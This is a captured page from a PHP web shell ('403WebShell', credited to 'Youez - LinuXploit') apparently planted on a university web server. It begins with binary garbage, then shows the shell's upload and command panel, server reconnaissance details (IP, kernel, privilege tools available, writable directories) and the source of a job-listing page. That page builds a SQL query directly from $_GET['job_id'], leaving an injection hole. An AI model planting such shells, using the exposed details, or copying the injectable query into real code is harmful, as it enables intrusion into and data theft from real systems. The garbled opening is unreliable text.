h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/regisjob/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/regisjob/submenu.php
 <?php include("headmenu.php");?>
 
<script type="text/javascript"> 
			function showSlidingDiv(b){
				var str="#slidingDiv"+(b);
				$(str).animate({"height": "toggle"}, { duration: 1000 });
			}
		</script>
<?php
//-------------------------ฟังก์ชันดึงข้อมูลสำหรับวนloop----------------------//
function records($conn,$sql){  //ฟังก์ชันดึงข้อมูลสำหรับวนloop
	unset($data);
	unset($rows);
	$result=mysqli_query($conn,$sql); 
	$rows=mysqli_num_rows($result); 
		for($i=0;$i<$rows;$i++){
		  //mysql_data_seek($result,$i);
		  $data[$i]=mysqli_fetch_array($result,MYSQLI_ASSOC);
		}
		return $data;
}
function records1($conn,$sql1){  //ฟังก์ชันดึงข้อมูลสำหรับวนloop
	unset($data1);
	$result1=mysqli_query($conn,$sql1); 
	 $rows1=mysqli_num_rows($result1); 
	for($j=0;$j<$rows1;$j++){
	  //mysql_data_seek($result,$i);
	  $data1[$j]=mysqli_fetch_array($result1,MYSQLI_ASSOC);
	}
	return $data1;
}
	/*				
	$data=records($conn,"SELECT * FROM jobposition,docposition WHERE jobposition.job_id=docposition.job_id AND jobposition.job_id='".$_GET['job_id']."' ORDER BY docposition.doc_id DESC"); */
	$data="SELECT * FROM jobposition,docposition WHERE jobposition.job_id=docposition.job_id AND jobposition.job_id='".$_GET['job_id']."' ORDER BY docposition.doc_id DESC";
	$qu=mysqli_query($conn,$data);
	$nu=mysqli_num_rows($qu);
	
?>

     <div class="row" style="padding-top: 20px;">
     
		<div class="col-md-12" >
            <section class="panel panel-default" style="margin-top:20px;">
             <div class="row" style="padding-top: 20px;">
                    <header>
						<h3>&nbsp;&nbsp;<img src="pic/l1.png" alt="" width="32">&nbsp;<strong>ประชาสัมพันธ์ตำแหน่งงาน <?php echo $row['job_name'];?></strong></h3>
                    </header>
                    <?php
					if($nu<>'0'){
					/*
						for($i=0;$i<count($data);$i++){
							 $b=$i+1;			
					 */
					 $i=0;
					 while($result=mysqli_fetch_array($qu,MYSQLI_ASSOC))	{
						  $b=$i+1;
						   $i++;
						   
					 ?>
                     <div class="col-md-12">
                    <?php if($b=='1'){ ?>
                    <div  class="bs-callout3 bs-callout-primary">
                    <?php }else{ ?>
                    <div  class="bs-callout2 bs-callout-primary">
					<?php } ?>
					
							<a href="#" onclick="showSlidingDiv(<?php echo $b;?>); return true;">
								<img src='pic/document.png' width='35px'/>
							</a>
							<a href="#" onclick="showSlidingDiv(<?php echo $b;?>); return true;">
                            	<span style="font-weight: bold;">
									<?php echo $result['doc_name'];?>
									<?php if($b=='1'){ ?>
                                    	<img src='pic/news.gif' width='50px'/>
                                    <?php } ?><br />
                                </span>
							</a>
                            <?php 
							  $doc_id=$result['doc_id'];
							 
							 $data1=records1($conn,"SELECT * FROM doc_file WHERE doc_id='$doc_id' ORDER BY file_id DESC");
							?>
                            	<div id="slidingDiv<?php echo $b;?>" style="display:none">
                                   <?php for($j=0;$j<count($data1);$j++){ ?>
									<strong><span style="color: #ff0000;"><a style="color: #ff0000;" href="admin/uploads/<?php echo $data1[$j]['file_load'];?>" target="_blank" rel="noopener"><?php echo "คลิกที่นี่เพื่ออ่าน  " ?></a></span></strong>
								<?php echo $data1[$j]['file_name'];?>
                                <br/>
                                 <hr class="my-2">
                                   <?php } ?> 
                                 </div>
                       		</div>
                       </div>
                      </div>  
               <?php } ?>
               </div>
               </div>
              <?php }else{ echo "ไม่มีข้อมูลประกาศ"; } ?> 
   			 </section> 
          </div>    
          </div>
     </div>
 <?php include("footmenu.php");?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit